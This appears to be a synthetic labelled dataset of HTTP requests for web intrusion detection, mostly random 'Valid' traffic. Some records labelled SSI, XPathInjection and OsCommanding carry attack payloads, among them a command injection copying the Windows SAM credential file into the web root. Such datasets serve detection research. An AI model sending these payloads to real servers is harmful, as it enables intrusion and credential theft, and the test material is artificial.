Cookie: hoebB2h=isee;pts2laaAooww=htpassgnkefu
Cookie2: $Version="102"
Date: Thu, 15 Apr 04 10:01:36 GMT
ETag: W/"xO92uavFzjswVlOknz"
Expect: 100-continue
From: eshil@tpeiae1n.fr
If-Modified-Since: Wed, 20 Aug 08 06:28:56 UTC
If-Unmodified-Since: Tue, 15 Jun 04 06:33:18 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 23 Apr 06 07:17:14 CET
Max-Forwards: 6014
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Digest algorithm=3ugedca2
Authorization: Digest algorithm=MD5-sess
Range: -971
Referer: http://www.hedde.st/onnln.aspx
TE: trailers
Trailer: TE
User-Agent: 1ctr0 (wNuM7Vku; y67Lap3; 45XrzQPA4t; eOVMUN; i4mLap)
UA-CPU: x86
UA-Disp: 2533,0787,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 9061x3656
Via: HTTP/8.2 182.5.122.124, 7.4 191.189.156.227, uqNthe/4.7 www.saczt.jpg:74669
Transfer-Encoding: deflate
Upgrade: qhe6/5.5, Ndaod/1.6, zcbn/9.5, tweeah/0.8, v9imgh/0.4
Warning: 007 191.37.179.245 "uyalDesz" "Sun, 01 Oct 06 09:05:01 CET"
X-Forwarded-For: 217.182.237.209
X-Serial-Number: 155066
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

UdwaS0na=15303&heE21eAt6I=h $) &pFUR=O0o&S5ZClZ3PgcP=5Wy4&rytfatlct=i$y&9D7-whereIPa=nsesri&AGdatblnoaKhs=erishsede

End - Id: 34066
Start - Id: 18626
class: Valid
GET /Qim3OUtKkBVL./e_J.shtml?tHniend=gus3gsi&dcpnaielcd8G=o9c&vogn=9524799630&eEdgofo=t&tog=0&oezowpnmEtan=lt9%3Ciu%5B2&e5seezTht9nplan=ah HTTP/1.0
Host: 182.47.249.241
Connection: close
Accept: application/x-tar
Accept-Charset: x-mac-icelandic;q=0.5
Accept-Encoding: 
Accept-Language: pxitiTh-eHeuq5ty, oc5-kgu;q=0.6, 5-gyhhr;q=0.4, j7shdr-mdsE
Cache-Control: max-stale=21482
Client-ip: 101.141.205.16
Cookie: seh0raykioRaaY=20453255;s0eghzsTgsi=uhtbn;se=9726441500
Cookie2: $Version="38"
Date: Sun, 10 Feb 08 18:57:25 CET
ETag: "l-bp1poSeDKn6Y_WO"
Expect: 100-continue
From: ngeuv@oyDuo4lt.uk
If-Modified-Since: Sat, 01 Oct 05 08:00:58 UTC
If-Unmodified-Since: Tue, 21 Mar 06 21:41:17 CET
If-Match: *
If-None-Match: "vvo7UrVRATxP3fzyh.dW"
If-Range: Fri, 19 May 06 04:39:50 UTC
Max-Forwards: 85
MIME-Version: 1.7
Pragma: d='a'
Proxy-Authorization: Basic ZW90YWlpOmhmZWhlRQ==
Authorization: Digest nonce
Range: -0
Referer: /suchtdE/oldr/to9cI/t0nbh4/ezrU6g.mpeg
TE: deflate;q=0.6,trailers
Trailer: Pragma
User-Agent: Mozilla/5.3 (X11; U; Unix 5.8; or-Ii; rv:1.8.4) Gecko/29678341
UA-CPU: 68000
UA-Disp: 1268,0056,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 7882x967
Via: 6.6 www.mEsiLtdo.tiff, FTP/2.2 165.28.251.24
Transfer-Encoding: identity
Upgrade: ndniu/9.9, rsSssn/8.8, bry2/5.0, aEnc/1.0
Warning: 871 165.27.62.53 "hetiwpovou9" 
X-Forwarded-For: 76.62.187.142
X-Serial-Number: 41593026
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18626
Start - Id: 32714
class: Valid
PUT /ondceblrnckh/AQixrwgaemhDbs/Kfiolnto/veprtfsc6f/Qaccess_log-passthruADK4SuC-/tsV8ZA/vIYnhnQ1ojtATxnaZqH3/ozF@hARjSj/zQMrZ.msf? HTTP/1.0
Content-Length: 113
Content-Language: 1sau
Content-Encoding: identity
Content-Location: http://9emm9.net/leTr/s9aehi/oiseoh0.mpg
Content-MD5: VGFSMHdhZmQ0cjF1ZHl5dA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 01 Dec 08 13:14:52 GMT
Last-Modified: Thu, 03 Mar 05 17:02:56 UTC
Host: www.a0ian3aih.org
Connection: close
Accept: */*
Accept-Charset: iso-10646-ucs-2;q=0.2, x-mac-greek;q=0.0, x-mac-korean;q=0.1, iso-8859-1;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 101.244.183.55
Cookie: 6tlegSfuhzeyE=nLOscriptedo-o0
Cookie2: $Version="09"
Date: Tue, 04 Apr 06 21:28:43 UTC
ETag: W/"Z-E63Eov10fSRQJm"
Expect: 100-continue
From: fe8a@oq0ry.ch
If-Modified-Since: Tue, 08 May 07 24:25:03 GMT
If-Unmodified-Since: Thu, 16 Feb 06 05:57:22 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: wi7ear oNnaa=i4e1
Authorization: NTLM YWFoZUF6YmVFaHRveFZtb29obWRxZ2FkZWhyd2VlYXN1YTg0eWVscnNOcGhF
Range: -512,-944936
Referer: http://www.8oAS.it/Stodr/lieaoc/lOihy.pl
TE: chunked;q=0.8,trailers
Trailer: Trailer
User-Agent: Mozilla/5.3 (X11; U; Unix 0.0; sn-nr; rv:3.8.9) Gecko/32583260
UA-CPU: MIPS
UA-Disp: 6104,859,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1210x8264
Via: cGtde/5.2 155.107.52.79
Transfer-Encoding: compress
Upgrade: omzoc/8.5, 2ywts/0.6, admamd/8.8, 5rta/4.5
Warning: 971 www.nreie.html:86955 "sootstDgebnbLaecv" 
X-Forwarded-For: 67.157.122.212
X-Serial-Number: 5962543728498976504
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

ssystngbnaxuEe=iewsse2lnpita&prlp_rcp=$rgoecopyI0telnetfh:(w&sswtlrwobh2=322479805&b3lru4seat=netc4h~eecr

End - Id: 32714
Start - Id: 8485
class: Valid
GET /ncibotix9denotigre/jR3iVtROl3/div1/od/oe88tpoHxSeeTs/i8ZSvlRmPy.xo.y.sh?rNamal=th3xhintMr5guf&bbeh=s&Xha.ZHZu3exec=3four5s%3Eloior%3Fv&rjmr0sn4mao=80&gbbigepdoemrt=tevqeaontudbRStd5&unhtwru1Tnanrnp=9tyap%28temenc8O&vl=28&mn3tfr=y.O3&p3Nrlclocation3oinP=a17RaL1K&a5hlab22fsnzOba=8732381130&iihoisoCitn=ncniemDnc&raEhCerm8e=81285364&psoet7phsre=xtermr&yuioex5eaeeie=4sn HTTP/1.1
Host: www.rNtIiSe.org
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: macintosh;q=0.1, euc-cn;q=0.6, windows-1255;q=0.8, iso-8859-3;q=0.2, x-mac-korean
Accept-Encoding: *
Accept-Language: hrm-x;q=0.3, dgics-hrrsoNor;q=0.3, eleeato-cOTa;q=0.3, r0-feei2j;q=0.3
Cache-Control: only-if-cached
Client-ip: 83.248.90.148
Cookie: 1SademEhsf4t=ttclikee )a&vecat;tea=64137;hwmgor09=5r0 nph-?eonOmhah;yltnnhiod=rIp@pujwoNyC
Cookie2: $Version="031"
Date: Sun, 02 Oct 05 08:14:03 CET
ETag: "x-0vskwvvt.CtBrpiL@m"
Expect: 100-continue
From: uifIa@nthr.st
If-Modified-Since: Sun, 28 Mar 04 10:58:31 GMT
If-Unmodified-Since: Fri, 21 Dec 07 19:46:25 GMT
If-Match: *
If-None-Match: "cnD_lf1IizqMzdzETV"
If-Range: Sat, 22 Dec 07 17:19:15 CET
Max-Forwards: 4147
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Basic ZWRpdWVxaWE6Nmxvb2k=
Authorization: NTLM TmF0eGdlQldzQWNobGZsbXNyYU1WcGx0OHZhelJzdGl6N3l6ZnN0YW52
Range: 27626-91
Referer: http://89iirEan.st/Hfnyata/ixewiae.jsp
TE: gzip,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/4.3 (compatible; hbhke; Linux i386; erRimt; IffstrMMfy)
UA-CPU: 68000
UA-Disp: 8051,5811,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 1005x1971
Via: 6.7 40.38.56.217
Transfer-Encoding: identity
Upgrade: oeims/3.9, lTs/0.8
Warning: 656 159.194.119.10 "raaeTf" 
X-Forwarded-For: 15.12.43.118
X-Serial-Number: 116122935
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8485
Start - Id: 39140
class: SSI
GET /3e/pnmumhi/bxNSyDvZ/rcpJpHKzNLhIZ/mg5ErJcyN_L/ap9VXnjs-/ls5iteadshAdtaJU/aEbGeRLzyC0LS/tjDJuf7Rg21KBj4-Ot/eKxK.bin?ahjltoqav=ii&cwrnechroopnth=oeir0ee%28Rdi5&firtp=nrrnmqr&lcBufreu=aetnuIrle&fV-MO0NsP=eh%3F%25sqqa%26uhouukerk%40u&p8t2snosaoi=273853379&passthrudHb=Eeosot60tt&0quZ97T=9447&iBV6Caccess_logYW=yiniTataaibatt&tsuNainh9to=acceptee&hlfyriiialgsoo=gDxUC3KwEGc-&tao9zntej=82770072&ywzaekso=nwp-a%3Cl&ceheteem0nf3=nandcopy&asoyn0mdLfeE=ezb%293 HTTP/1.1
Host: www.ceeEaiyL.org:80
Connection: close
Accept: application/*, video/mpeg;q=0.5
Accept-Charset: windows-1257, euc-cn
Accept-Encoding: <!--#email fromhost="www.adrs8t4i.com" tohost="mailbox.93un.com" message="adnH eH4ofha ai8lzan oo9eE" fromaddress="dsrLQu.com" toaddress="rcee.hqg0Ae.com" subject="bp" sender="tte.com" replyto="h4ulhs.com" cc="eFrx" inreplyto="at4 cbo bs11eE" id="sftZ2mail" -->
Accept-Language: *;q=0.5
Cache-Control: max-age=617
Client-ip: 19.255.101.192
Cookie: rsgoAiEheors=984152;zaaYilrbaovxE=axk_R9kH@9;4u=tp;earrRofrem=A;tmisKc52SeH=evovohIc;mz_sw=g eahlkoiincludee
Cookie2: $Version="503"
Date: Thu, 06 Nov 08 20:47:52 GMT
ETag: W/"3lm3ehkeXKSz7_2xl@"
From: dwtnbtl@re8os1r5d.org
If-Modified-Since: Mon, 26 Jan 04 10:23:27 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 19 Jun 06 14:10:15 CET
Max-Forwards: 2
Proxy-Authorization: Basic YU9tbm9yOm9uYWw=
Authorization: 4srCbj 2fS0Y=3dxIys
Range: 85-9,-11
Referer: http://mte0jhip.cz/hcp6Cboi/irkho4/cnbtn/awethlpn.css
TE: trailers,trailers,trailers
User-Agent: <!--#echo var="date_gmt"-->
UA-CPU: StrongARM
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 855x947
Via: 9.3 203.90.172.83:7
Warning: 601 129.18.108.121 "hesrsMelefcoI" 
X-Forwarded-For: 112.205.75.183

null

End - Id: 39140
Start - Id: 20066
class: Valid
GET /ntzmisrtocsp/rG2-3/oorlbSedtl7haodol3na/nFfLfR.GKHHaBpQHbWvf/qTQlwNzadMFYuCZs-7.html?mEUttpniga=0768433807&ps=674190&dw0e9n=64880650&ornTAec=nHewsaTITaanbfNer2&AX6orEB-hMQm=323536730 HTTP/1.0
Host: www.tatgb5sE.st
Connection: close
Accept: application/*;q=0.2, text/html
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 180.96.17.0
Cookie: 1uc=hb1h;htnhhnebq=i8JJp@OvFy;UsIsr=767295;CxG0c9qn.D=reot;RcRl=velsddaotbfie
Cookie2: $Version="462"
Date: Mon, 18 Jan 10 11:31:21 UTC
ETag: "Z6_Ib..yGOPyENmcvJ0"
Expect: Tawhh
From: lnAp2pl@vGteni.biz
If-Modified-Since: Wed, 25 Jul 07 01:03:54 CET
If-Unmodified-Since: Thu, 30 Nov 06 19:29:05 CET
If-Match: "RS1usDqLbnuIdOKSmnj"
If-None-Match: "86PnE21@58rQu4LM"
If-Range: *
Max-Forwards: 151
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.soar.ch/Mnti/etre/jSi8/hgnp/dst9a.tar.gz
Authorization: Basic eWZ0dDphZ3VkZ29F
Range: -09642
Referer: http://bhlx3dpt.gov/tmfeiAF/zzgs1l/tshs.cgi
TE: trailers,gzip
Trailer: User-Agent
User-Agent: s.87HvHM@k http://www.lA4oaie1.cz
UA-CPU: PowerPC
UA-Disp: 894,918,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1108x908
Via: 9.2 41.154.164.167:6382
Transfer-Encoding: sogoM2
Upgrade: edl/6.4, oivt/9.3, uhe/8.8, vst/2.0
Warning: 485 www.jhRr.jpeg:676 "OiasmehS94eryns" "Fri, 26 Aug 05 21:12:46 CET"
X-Forwarded-For: 51.235.225.48
X-Serial-Number: 9909201039312
----: --------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 20066
Start - Id: 15943
class: Valid
GET /knApBF/idlirtpnhenclnile/eIes6do1/i7xloAKWM.Ksh@3ruk4.css? HTTP/1.0
Host: www.mtzevpe1eo.it:67
Connection: keep-alive
Accept: image/jpeg, video/*;q=0.0, image/*
Accept-Charset: windows-874;q=0.0, x-mac-japanese, iso-8859-6, cp-932;q=0.4
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 240.237.65.163
Cookie: ayUtgrz=S NhUuhsbeho
Cookie2: $Version="4"
Date: Wed, 05 Oct 05 08:42:57 CET
ETag: W/"BMtPzHuJJL8hG6tFi"
Expect: 100-continue
From: foupIigo@8aw9mD.net
If-Modified-Since: Tue, 04 Jul 06 19:59:48 GMT
If-Unmodified-Since: Mon, 13 Feb 06 15:48:13 UTC
If-Match: *
If-None-Match: "7C@ec@HYEmG8a5T"
If-Range: "SSGdwgIXkJfY8u3wgKr3"
Max-Forwards: 017
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Basic OU5Ucmk1OnNzRWxh
Authorization: NTLM Z2hJbW9uYW91bm5IbHBkZmlibmNvaW9tYXNFeWFleG80cg==
Range: 638-
Referer: /l1oeu/uqlo/thhua/Ntdir.css
TE: trailers
Trailer: Accept-Charset
User-Agent: mx@e5mgT http://www.onei.fr
UA-CPU: StrongARM
UA-Disp: 9788,9519,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7490x6757
Via: FTP/8.0 www.rDrce6r.css
Transfer-Encoding: deflate
Upgrade: nbf6oi/8.6, oqeh/3.0
Warning: 043 43.221.213.2 "aosrvsdSerhlegrta" 
X-Forwarded-For: 85.163.36.22
X-Serial-Number: 902795825
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15943
Start - Id: 7913
class: Valid
POST /9bJIXmhX/sq/noaetriu7eodeR/iI7ukY_.9GHzKms0QZX/zobjectXLP0b4/ygQiiu-PwGjmTqdinMk2/acoMBaCYHWX90kRjZGO/mt8dooTeESbaiolgerrn.php? HTTP/1.0
Content-Length: 311
Content-Language: r2e
Content-Encoding: compress
Content-Location: http://www.ttami.cz/rssb.jpeg
Content-MD5: b2ZtdXRsaW9vbG5nZWFFYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 19 Dec 07 17:51:59 UTC
Last-Modified: Tue, 09 Feb 10 24:36:33 GMT
Host: www.dn90e.be:657
Connection: close
Accept: */*;q=0.1
Accept-Charset: windows-1250;q=0.2, iso-8859-5, x-mac-korean, iso-8859-3, us-ascii;q=0.8
Accept-Encoding: identity, deflate
Accept-Language: 5aeadAo-eee
Cache-Control: ajbenx=rs
Client-ip: 32.68.134.36
Cookie: sBhtnm5a=10472;5wEU21=aen4ysd;bf3xane=a1e6iNbn2oqlraiin;esjncFoe=uu;Awerolrutegena=Hosttsa
Cookie2: $Version="566"
Date: Wed, 14 May 08 02:20:35 CET
ETag: W/"PmnR7UTQ8v8R78UvZu"
Expect: 100-continue
From: ef1i1ii0@9rAe.st
If-Modified-Since: Mon, 02 Mar 09 07:58:58 CET
If-Unmodified-Since: Fri, 10 Jun 05 04:09:29 GMT
If-Match: "8CrOh@.x3HR7HzCk"
If-None-Match: *
If-Range: Fri, 23 Nov 07 14:52:09 UTC
Max-Forwards: 3875
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Digest username="sceiDcRc"
Authorization: Digest nonce
Range: -7290,-491,343026-
Referer: /wcooiy1p/esaueer/xnpncf.gif
TE: trailers,deflate;q=0.9,trailers
Trailer: If-Range
User-Agent: zaogaihte/4.3
UA-CPU: StrongARM
UA-Disp: 9422,2675,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 558x584
Via: HTTP/1.3 www.edhw1n.jpeg, me0en/0.7 145.161.167.64, sNtr/1.5 www.trul.html
Transfer-Encoding: hdsu; st8uehR=eucRd
Upgrade: 9cs/4.0
Warning: 977 149.105.53.80 "sbonttde" 
X-Forwarded-For: 179.151.107.237
X-Serial-Number: 534170749
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

MPJd=60098&rvtre45cXwl=ehaegtdkPkeof]e&a2wxNGmshyfakno=/li0\tr&RuTaO=ea&2dcwi9lde=rkwhere4I&oyeol0b=~$&fLIhYX-mWj=oPJsAAf5DP&oa7p=71&gan=ncdofTrlogmetaRatv&telq99ooo2=ritt?n[osum<539tcdocument&CDHb_.@dC82x=>&&8Iehiya=5005&Cd=wfntaudhdukrifKs&wmaeyfnemt=fmewxsoi&mm&lwtTtlrr1RI=eAZgTIYS177J

End - Id: 7913
Start - Id: 12175
class: Valid
GET /bwTgtdy4efh8v2e7mh/WWz_BzETvkZp4/nfQ/oh82Fi/5siasr9iesnta.php4?eestoene4e=4&3cgno=wreplace&ess3t=8091722654&ibUxMFdVftN=iiOtd%3Ckn0d%26%5Dxevals%3Ar&t50desqibjb=rai&r1tlau7m3adgHp=80574&ttNnhea=61&ksd=7170005&Dqk0aLXK4bodydYwinnt=rlc&grshpeng=9&srje=Aa-0n-oet2%7E8bina%2B HTTP/1.0
Host: www.raerothot.gov:80
Connection: yt1rooI
Accept: video/*
Accept-Charset: *;q=0.0
Accept-Encoding: gzip, identity, identity
Accept-Language: *
Cache-Control: max-stale=0
Client-ip: 42.157.138.178
Cookie: slRptmaCs=jea;ue56exec3GZ=sxebeoolfEi32dtrlo
Cookie2: $Version="3"
Date: Wed, 05 Oct 05 10:09:23 CET
ETag: "vP5WyXiK_Ogb6z9m@"
Expect: 100-continue
From: eeotsLel@forahartri.net
If-Modified-Since: Sat, 18 Jun 05 14:11:42 CET
If-Unmodified-Since: Thu, 24 Jun 04 14:30:27 CET
If-Match: "uIxL4Xa2dUpHFsBnQaD"
If-None-Match: "FmT@w-MJ8Go.B--W"
If-Range: Sun, 29 Mar 09 11:42:55 CET
Max-Forwards: 0217
MIME-Version: 1.4
Pragma: d=neM
Proxy-Authorization: lert mmeei=fdhn
Authorization: syualn atb5Dae=akwes
Range: -6
Referer: http://afwawr76.gov/hjnbae/ssqdyAMr/ncuofph.tar.gz
TE: trailers
Trailer: Via
User-Agent: seelGdns (fpHX@d; oGvo.0g; ywbqo8EZ; t@CG37; euBlHZ)
UA-CPU: 68000
UA-Disp: 3158,9578,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 161x2699
Via: 4.6 www.hirepn.jpg, 8.5 www.oyht.htm
Transfer-Encoding: identity
Upgrade: baheen/8.2, os6u/6.0, sloeee/4.4
Warning: 799 56.216.155.145 "xcmStingtiLaa" 
X-Forwarded-For: 215.199.241.153
X-Serial-Number: 36511935
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12175
Start - Id: 11252
class: Valid
GET /al/oIg3Ssk5LWzqhU/ftpZ4bin8KBfTiw-n_f/yDU7WXvTXKvuK_udwtdO/2T20nQyB6LUEwK3/7aat/nww0OM/eeu420Gta3sn/14xAEJCA/2ruCVO-bY9L8-VBf/neeyedstiD9l.css?y5asx9dedsebo=327327&w9deenPi=a3l15+&paosolsu4hk0=24&si9nsapni=THentf HTTP/1.1
Host: www.inta.biz
Connection: close
Accept: text/*, video/*;q=0.7
Accept-Charset: cp-950, iso-2022-kr, cp-932;q=0.4, x-mac-chinesetrad;q=0.7, x-mac-cyrillic;q=0.9
Accept-Encoding: compress, identity;q=0.1, gzip;q=0.0, compress, gzip;q=0.8
Accept-Language: *;q=0.1
Cache-Control: max-age=54740
Client-ip: 46.68.6.51
Cookie: rdneiatifepo=1;slqhdncde=f7N
Cookie2: $Version="14"
Date: Sun, 18 Jul 04 12:41:18 GMT
ETag: "r6cFlT69xgKl84H"
Expect: Einw
From: aarli@mLmeltu.be
If-Modified-Since: Thu, 16 Aug 07 21:23:49 GMT
If-Unmodified-Since: Mon, 02 Nov 09 10:59:56 UTC
If-Match: "JQqgoMb332Y6iffww7LP"
If-None-Match: "rmI-c63HnFsPgx.7DtqS"
If-Range: *
Max-Forwards: 4
MIME-Version: 1.5
Pragma: d5r='uihEoe'
Proxy-Authorization: Basic dE5wcGVlOm9pc3M1Yw==
Authorization: Basic bXM1b3k6ZW8xdGlyeWE=
Range: 04605-
Referer: /oyia/srh9/ocrsaoot/dmeo5naT/tzlTyyw.tiff
TE: trailers,trailers,gzip
Trailer: Pragma
User-Agent: iNyTSGBr http://www.5nfm.net
UA-CPU: PowerPC
UA-Disp: 2659,0505,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 234x2210
Via: 3.2 50.162.126.178, 7.2 91.175.6.47:2, 5.5 www.eJ5sa.html
Transfer-Encoding: compress
Upgrade: ezh/4.9, hQouO/8.3, Ttomi/2.4, iind/9.4, umvntb/3.3
Warning: 161 www.seronAo.png:075 "fmlpedheomt" 
X-Forwarded-For: 209.31.228.173
X-Serial-Number: 450563801661696804
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 11252
Start - Id: 28540
class: Valid
GET /yf0/8Y8X.8sk6G.php3?sms8ddouo3zE1Er=hstted8ns0TiNeaihs&rnimdz=4srhiheutjomlhl&ZCDTDpS=r%26+n+ma4or&Op7autoexecc3cbwhere=802&nM8OTvarhyP=0053424 HTTP/1.1
Host: www.s6w7.gov:4
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-age=5603
Client-ip: 81.119.248.8
Cookie: t6y=pq cds;5nn8unita5naw=adit
Cookie2: $Version="420"
Date: Wed, 03 Aug 05 19:47:53 UTC
ETag: W/"d8l7kAzDFiLNc-Wyw3GV"
Expect: 100-continue
From: tuezrt@nexhlht5a.it
If-Modified-Since: Wed, 05 Apr 06 17:38:04 CET
If-Unmodified-Since: Wed, 24 Jun 09 21:49:09 GMT
If-Match: *
If-None-Match: "6BSRBGQdCE9kRZ3"
If-Range: Sun, 24 Jan 10 18:26:49 GMT
Max-Forwards: 6924
MIME-Version: 8.0
Pragma: eot=ufyzufa
Proxy-Authorization: 1h6aL 2soNn=rl1nsusL
Authorization: Digest nonce
Range: 6-267184,-1,5-7119
Referer: http://www.na6no.fr/eqiAnX/9enn5dTh/wofee/fdiiNlHn.png
TE: trailers,deflate
Trailer: Accept-Charset
User-Agent: Mozilla/4.5 (Machintosh; U; PPC Mac OS X 0.4; sN-oe; rv:2.3.2) Gecko/08763184
UA-CPU: PowerPC
UA-Disp: 3600,6698,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 6545x8948
Via: 0to3g/2.2 191.224.75.147
Transfer-Encoding: identity
Upgrade: 8omcl/7.6
Warning: 013 38.161.125.54 "rsGoemitnia" 
X-Forwarded-For: 199.127.83.69
X-Serial-Number: 672108482852
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28540
Start - Id: 23587
class: Valid
GET /oWBTGuwU1tV0H/cWid@8IfVx_tmp.shtml?jsnme=%5Chge&uotrohea=3593 HTTP/1.1
Host: www.3keeQ9ei.be
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: big5, windows-1254, x-mac-japanese
Accept-Encoding: identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 221.145.247.253
Cookie: Tsit=ngroup byn
Cookie2: $Version="6"
Date: Wed, 25 Nov 09 05:54:07 GMT
ETag: "aOgDK4jWFYT6rxO"
Expect: WFtlEa=s62Apn;bEaareaI=h3edeTeq
From: Aial5osa@Mysrie.uk
If-Modified-Since: Sat, 01 Oct 05 06:00:03 UTC
If-Unmodified-Since: Sun, 09 May 04 14:46:50 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2273
MIME-Version: 6.3
Pragma: 2e1id='g'
Proxy-Authorization: rXite lhh9o=0huotic
Authorization: NTLM cm9sZXdidHNtbnJvUHJjc25mc25pcnJ6ZGNubzFpcWRvTnJp
Range: 62145-4,-94,41-
Referer: http://fttfks.ch/eTfes/eroteo/e2hmFn/shtnilah.gif
TE: trailers,trailers
Trailer: User-Agent
User-Agent: qyugd3/5.9.1.2.4
UA-CPU: PowerPC
UA-Disp: 990,4504,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 084x927
Via: 8.6 www.Dksliae.jpg
Transfer-Encoding: gzip
Upgrade: oza/2.5
Warning: 942 www.stchto.jpg "wMlilUefo" "Sun, 18 Jun 06 16:19:46 UTC"
X-Forwarded-For: 141.227.170.60
X-Serial-Number: 1009110184973666911
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23587
Start - Id: 48813
class: XPathInjection
GET /toFdmhsai/ac9c5vEzMpGlk@RbG/wR8F3pkem/t2sia5inpofll/5WMJpD.mspx?hRawinnt_Ya=iLY&3edxde=ielusen%27++++or++count%28+++path%2Fchild%3A%3Anode%28%29%5Bposition%28++%29%3D%28%28i%2Bj+%2Bk+%2B++l++%2B+1%29%5D+%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or+++++%27hal%27++++%3D+++%27+++++ttarHar%27++++or&ekte=lyaoiunr79axmado HTTP/1.0
Host: www.jfhiae.it:80
Connection: keep-alive
Accept: application/zip;q=0.2, video/*;q=0.4, video/*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 5.230.196.145
Cookie: jRrAjU=t4ewdderrrar;o4=dati3uxcrsoa
Cookie2: $Version="7"
Date: Fri, 28 May 04 19:45:45 CET
ETag: W/"6WLOop_Whk@w0uCW8DO"
Expect: 100-continue
From: 18kll@eaes.it
If-Modified-Since: Fri, 30 Apr 04 05:55:05 GMT
If-Unmodified-Since: Sat, 03 Jan 09 04:44:01 CET
If-Match: "e@nrx@bG2IYw9Bqyh"
If-None-Match: "wfzmhPHqsrJSj.C6"
If-Range: Sun, 10 Jul 05 02:03:38 UTC
Max-Forwards: 61
MIME-Version: 7.6
Pragma: ofw=eRvn
Proxy-Authorization: Digest response="08bA7c67a569BFcBED9f6CeCC1e6B5Cb"
Authorization: Basic bVAzNmxPOmxsaWVz
Range: 5889-260241,53147-,8-96
Referer: http://www.E1ooLn.biz/oeed/Bottx.mpg
TE: trailers,chunked;q=0.1
Trailer: If-Match
User-Agent: dtgixva
UA-CPU: MIPS
UA-Disp: 065,1900,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 610x7320
Via: FTP/9.5 84.230.141.51
Transfer-Encoding: compress
Upgrade: aimtj/3.9, eeTl/5.5, Otocrt/9.5
Warning: 095 48.11.160.104 "zathsTosotrtckdn" 
X-Forwarded-For: 30.210.172.155
X-Serial-Number: 9894674694471428
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 48813
Start - Id: 42881
class: OsCommanding
GET /vmetw4Yo/fFJ78xDCS0/havingqiframeexecFhf/m56cFaudooon/bFelt9xs/PWdJ/oy.gif?saaird1aa=e_UNDLDElrrb&5ieGopenMZX=1027&iltMap1fq7hdt=tqt&UBG3LaEBM=211.187.172.64+%7C++copy+c%3A%5Cwinnt%5Crepair%5Csam._+c%3A%5Cinetpub%5Cwwwroot%5Csam.ddd&pLgPxeiaamsl=eAYPYApMrU HTTP/1.1
Host: 239.178.68.179:80
Connection: keep-alive
Accept: application/*;q=0.5, image/png;q=0.2
Accept-Charset: iso-8859-7;q=0.1, iso-2022-jp;q=0.4, hz-gb-2312, utf-7;q=0.1, big5;q=0.9
Accept-Encoding: identity;q=0.3, identity;q=0.7, deflate;q=0.1, deflate, gzip;q=0.1
Accept-Language: oas-nrnlete, hA0uc-i
Cache-Control: only-if-cached
Client-ip: 241.68.47.162
Cookie: tottqrih0ceNcie=081784;rrdgo6c=fP5Is;o0ctegtpo=rfsi;lma422losSotrr2=tZC4S.PzH8iM
Cookie2: $Version="443"
Date: Fri, 24 Dec 04 24:35:10 GMT
ETag: "mC@rd8lAtMiE6hU-B"
Expect: 100-continue
From: n2zse0bo@tibsA.uk
If-Modified-Since: Sat, 13 Jun 09 14:38:46 CET
If-Unmodified-Since: Sat, 28 Nov 09 19:04:30 UTC
If-Match: *
If-None-Match: *
If-Range: "vdpXp3HQsUZ56Y3"
Max-Forwards: 8384
MIME-Version: 6.8
Pragma: gaNta=ssyssn
